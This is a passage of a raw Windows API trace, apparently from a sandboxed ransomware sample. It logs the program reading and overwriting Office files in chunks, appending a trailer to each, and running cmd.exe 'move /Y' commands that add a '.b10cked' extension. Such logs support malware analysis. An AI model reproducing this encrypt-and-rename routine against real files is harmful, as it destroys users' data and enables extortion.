lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.869] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.869] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x9f078 [0168.869] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x9f560 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x9f560 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.873] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.900] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.901] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0168.903] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.903] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.904] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.904] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0168.904] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0168.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.907] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.912] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0168.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0168.914] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.915] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.915] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0168.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7f560 [0168.916] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.917] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.918] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0168.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7f560 [0168.920] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.920] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.921] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0168.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0168.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0168.927] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x9f560 [0168.927] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.929] CloseHandle (hObject=0x114) returned 1 [0168.941] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX") returned 0x3c [0168.942] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.943] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x838, dwThreadId=0x974)) returned 1 [0169.073] CloseHandle (hObject=0x1b4) returned 1 [0169.073] CloseHandle (hObject=0x114) returned 1 [0169.073] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.073] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.073] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0169.073] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.073] ReleaseMutex (hMutex=0xf8) returned 1 [0169.073] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.074] ReleaseMutex (hMutex=0xf8) returned 1 [0169.074] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.074] ReleaseMutex (hMutex=0xf8) returned 1 [0169.074] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.074] ReleaseMutex (hMutex=0xf8) returned 1 [0169.074] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.175] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22596449508) returned 1 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2d60 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.178] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.178] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2878 [0169.178] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0169.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2d60 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2d60 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.348] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x16af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x16af, lpOverlapped=0x0) returned 1 [0169.351] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.351] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x16af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x16af, lpOverlapped=0x0) returned 1 [0169.351] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5807, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x16b1 [0169.352] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x16af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x16af, lpOverlapped=0x0) returned 1 [0169.352] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5807, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x16b1 [0169.352] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x16af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x16af, lpOverlapped=0x0) returned 1 [0169.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0169.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLWVW.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0169.359] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2d60 [0169.359] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0169.359] CloseHandle (hObject=0x114) returned 1 [0169.360] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX") returned 0x3c [0169.362] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0169.362] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x848, dwThreadId=0x9e0)) returned 1 [0169.384] CloseHandle (hObject=0x1b4) returned 1 [0169.384] CloseHandle (hObject=0x114) returned 1 [0169.384] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.384] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 